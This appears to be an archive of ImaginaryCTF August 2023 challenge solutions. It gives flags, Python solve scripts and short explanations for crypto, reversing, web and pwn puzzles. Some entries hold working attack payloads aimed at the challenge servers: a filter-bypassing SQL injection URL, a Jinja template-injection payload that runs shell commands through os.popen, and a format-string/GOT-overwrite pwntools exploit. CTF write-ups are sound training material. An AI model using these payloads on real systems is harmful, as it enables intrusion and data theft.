Archived Challenges - August 2023

Submit the flag...

ictf{.}

from pwn import *
from time import sleep
import re

LOCAL = 0

def get_new_process():
    if LOCAL:
        return process(["python3", "./server.py"])
    else:
        return remote("puzzler7.imaginaryctf.org", 14001)

p = get_new_process()

p.recvuntil(b": ")
p.sendline(b"ictf{")
p.recvuntil(b"just ")
count = int(p.recvline().decode().split()[0]) - 1


flag_inner = ''
for i in range(count):
    pwds = []
    for c in range(33, 127):
        pwds.append('ictf{' + ' '*i + chr(c) + ' '*(count - i - 1) + '}')
    p.sendline('\n'.join(pwds).encode())
    if not LOCAL:
        sleep(.2)
    output = [int(re.sub(r"\D", "", line)) for line in p.clean().decode().splitlines()[:-1]]
    for i, out in enumerate(output):
        if out < count:
            flag_inner += chr(i + 33)
            break
    print(f"ictf{{{flag_inner}")
print(f"ictf{{{flag_inner}}}")

You can first get the flag length by entering an empty string. You can then brute force the password character by character, as you know when you have a correct character if the count of wrong characters decreases.

ictf{customer_service_ftw_0d2f}

ct = b'\xc3\tf\xa4\x058\x83\xd1%e\xc6\rI\x97\xe1;\x8f\xc9\x1a]\xb7\x05T\x93\xd9)s\xc3\x1dW\xb4\xbbF\x8f\xdd#i\xb9\x03S\xad\xe7D}\xcd\x1ec\xba\x06c'
    
def unseesawr(s, key):
    return bytes((c - (1-2*i)*key)%256 for i, c in enumerate(s))

for i in range(256):
    flag = unseesawr(ct, i)
    if b'ictf' in flag:
        print(flag)
        break

The program alternates adding and subtracting the key from the characters in the flag - reversing this yields the flag.

ictf{back_to_a_much_more_caesar-like_caesar_chall}

Throwing n into a factorizer like Alpertron (https://www.alpertron.com.ar/ECM.HTM) will show that all of the factors of n are small primes. You can then calculate phi and get the flag.

from Crypto.Util.number import long_to_bytes
from math import gcd

exec(open("output.txt").read())

phi = 1
p = 2
primes = []
n_copy = n
while n_copy > 1:
    if n_copy % p == 0:
        phi *= p - 1
        n_copy //= p
        primes.append(p)
    p += 1
print(primes)
d = pow(e, -1, phi)
m = pow(c, d, n)
print(long_to_bytes(m))

ictf{don't_mind_me_just_sneaking_more_primes_into_n}

XOR with ictf

ictf{fl4g_f0rmat_f0r_the_w1n!_!_!_!_!_!_!_!_!_!_!_!}

https://imaginaryctf.org/f/xWFwk#x.py

Length extension attack by using the extend_time function to add data. Bypass the length check by using scientific notation ex. "5e10" → 50000000000. There exist multiple tools for this attack but i used https://github.com/stephenbradshaw/hlextend

ictf{length_extension_attack_more_like_time_extension_attack}

LFSR_SIZE = 8

def paddedbin(n: int, padding: int = LFSR_SIZE):
    return f"0b{bin(n)[2:].rjust(padding, '0')}"


def xor_all(things: list[int]):
    if len(things) == 0:
        return 0
    return things.pop(0) ^ xor_all(things)


def next_val(current_state: int, taps: list[int]) -> int:
    new_msb = xor_all([(current_state >> LFSR_SIZE-tap) & 1 for tap in taps])
    return (current_state >> 1) | (new_msb << LFSR_SIZE-1)


data = open("output.txt").read()
data = [int(datum) for datum in data.split(" ")]

for _ in range(256):
    output = ""
    for index, datum in enumerate(data):
        datum = datum ^ _
        find_bit = xor_all([datum >> 7 & 1, datum & 1])
        charv = (((datum << 1) & 0b11111111) | find_bit)
        output += chr(charv)
    if "ictf{" in output:
        print(f"XOR Key: {_}\nFlag: {output}")

solve idea: see that each character is encrypted and then xored, so to decrypt, must xor and then decrypt, requires brute force, use msb and lsb and xor them to get the new lsb, left shift by 1 and use or operator on result of xor

ictf{lfsrs_are_also_used_in_tetris_7ef19179a06}

@echo-http-requests.appspot.com/echo

Entering an @ as the first character causes the flag to be treated as a username in Basic Authorization. The website echos your headers back to you, so you can grab the Authorization header and base64 decode it to get the flag.

ictf{authentication_saves_the_day}

http://puzzler7.imaginaryctf.org:14002/?lastname=%27+union%2F**%2Fselect+*%2C+null%2F**%2Ffrom+users%3B+%2F*

The server only checks to see if a word exactly matches a keyword when sanitizing. By using /**/ as a word break, we turn something like union select (two failing words) into union/**/select (one passing word). The payload ' union/**/select *, null/**/from users; /* will get the flag.

ictf{does_the_/**/_look_like_a_fuzzy_crab_to_anyone_else?}

http://puzzler7.imaginaryctf.org:14005/user?username=%7B%7B%27%27%27%7D%7D&bio=%27%27%27%2Blipsum.__globals__.os.popen(%27cat+*.txt%27).read()%2B%27%27%27

Username: {{'''}} Bio: '''+lipsum.__globals__.os.popen('cat *.txt').read()+'''

Brackets are blacklisted in the bio, so it's impossible to do SSTI there alone, and the username is too short to SSTI (I believe the shortest known RCE SSTI payload is 40 characters + command length). However, the username is placed both before and after the bio, so we can put most of our payload in the bio, and just put brackets in the username.

We do this with a username of {{'''}} and a bio of '''+<payload>+''', making our final output:

{{'''}}
<garbage>
'''+<payload>+'''
<garbage>
{{'''}}

The open brackets open a template. The triple quotes makes a multiline string, eating the close brackets and the first garbage, then our payload is executed, and the we make another multiline string, eating the second garbage and the open brackets, and then our template is finally closed.

Finally, we can substitute for your favorite Jinja SSTI payload, or grab one from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2 if you don't have a favorite.

ictf{definitely_a_trillion_dollar_company}

checks = <snip>
checks = sorted(checks, key=lambda x:x[1])
sorted_checks = checks[:1]

for i in range(42):
    nxt = None
    for check in checks:
        if check[1] == sorted_checks[-1][0]:
            sorted_checks.append(check)
            break
checks = sorted_checks
btl = lambda b: int(b.hex(), 16)

flag = [None for i in range(43)]
flag[0] = ord('i')

for check in checks:
    a, b, m, n, x = check
    m = btl(m)
    n = btl(n)
    x = btl(x)
    b = flag[b]
    for i in range(32, 127):
        if (i*pow(m, b, n))%n == x:
            flag[a] = i
            break

print(bytes(flag))

Each tuple in check corresponds to an equation involving two of the characters of the flag that has to be satisfied. Knowing the first character of the flag, you can then use a equation involving that character to find another character, and repeat until the entire flag is known.

ictf{round_and_around_and_around_we_gooooo}

https://imaginaryctf.org/f/3MS2G#x.py

A revenge to Dependency from May 2023, more or less. The binary creates a hash map of the characters in the flag to a linked list of the positions that character is in, and then dumps the heap to a file.

The file consists of 16 byte and 24 byte blocks, which are separated by some metadata. Splitting this out, we can determine the base address by looking at all of the addresses present and finding the lowest, which will point to one of the first blocks. Then, all blocks not referenced by another block will be the root of the bucket of the hash map, and we can iterate through to recover the flag.

ictf{yet_another_flag_ex@ctly_sixty_thr33_characters_in_length}

zipdetails out.zip | grep -oP "'files/." | sed s~\'files/~~ | tr -d "\n" | head -c 42

The characters of the flag are the order that the files were added to the zip file.

ictf{The_FIv3~box!ng-w1zards^jump*qU|(kly}

Each part of the cyberchef program checks a certain part of the flag, and then either continues or halts and says "nope!". You can pause execution at each step to see the output. You can also disable steps that are impossible to reverse. The parts, in order, are (all byte numbers are 0 indexed):

• Storing the flag in a register $R0 and jumping to the start of the program
• The bit that prints if you win
• The bit that prints if you lose
• A check that the flag is in flag format
• A check that the sums of the binary of the characters matches a certain value (seems difficult/impossible to cleanly reverse, can be disabled)
• A check for the length of the flag (42) by counting the characters with regex
• A check that bytes 5 - 13 of the flag are cyberchef
• A check that bytes 14 - 16 have the correct md5 hash
• A check that bytes 17 - 19 have the correct value after being encoded in several bases
• A check that bytes 20 - 26 have the correct value of NATO alphabet
• A check that takes the atbash cipher of the flag, converts to decimal twice, multiplies the values together, and compares it against a value (seems difficult/impossible to cleanly reverse, can be disabled)
• A check that bytes 26 and 27 are a_ with a JPath expression
• A check that bytes 28 - 32 and 39 and satisfy a bunch of math
• A check that bytes 28 - 32 are fl4g_ (lets you brute force char 39 with the prev step)
• A check that bytes 33 - 38 are certain values by converting them to pixels and checking the output with regex
• A check for the sha3 of the flag

Reversing each step will yield the flag, and brute forcing against the sha3 hash will help check against any characters that might be missing (or if you didn't want to rev one of the checks).

ictf{cyberchef?_i5nt_1h4t_a_fl4g_check3r?}

You can use LD_PRELOAD to inject code into the process and dump the binary. Although the file format isn't quite correct, tools like IDA can still decompile it easily. Then you will know the checker is just a simple seed-then-xor-with-rand flag checker. Note that the server uses alpine, so you need to use a musl libc implementation for that.

https://imaginaryctf.org/f/En8tL#sol.tar.gz

ictf{what?!_how_did_you_get_my_binary}

from pwn import *

context.binary = elf = ELF("./chal")
#conn = process()
conn = remote("155.248.203.119", 42051)

payload = b""
payload += p64(elf.sym.pwd)
payload += b"a"*64
payload += p64(elf.sym.vuln)
conn.sendline(payload)
conn.sendline(f"%{0x31337}c%10$lln".encode())
conn.recvuntil(b"\xd0")
conn.interactive()

ictf{rondo_keeps_asking_for_pwn_so_i_delivered}

Use the format string to overwrite the GOT entry of printf with system. (and the fact that in the previous solution, we actually create a loop of printf)

https://imaginaryctf.org/f/EsV3m#solve.py

ictf{d0_pwnies_even_have_arms}

https://imaginaryctf.org/f/8qJTN#x.py

There's a trivial buffer overflow when changing your password - overflowing it let's you set whether the user is admin or not, letting you get the flag.

ictf{rust_1s_fun_r1ght?}

prod is done modulo 2^{64 because numpy converts everything to 64-bit. divisor_count==4 means that prod is either p}3 or pq, the main concern being the power of 2. This means that most of the bytes in our command need to be odd. Using p^3 with p=2 allows us to sneak in a single left parentheses which is all we need for arbitrary code execution. We can get unicode letters to form eval or exec, and string-manipulate the rest. in Then use LLL or whatever to pad the rest of the string to get product 8 or -8 using dlogs.

ictf{w4s_th1s_mor3_crypt0_0r_pyj4il?}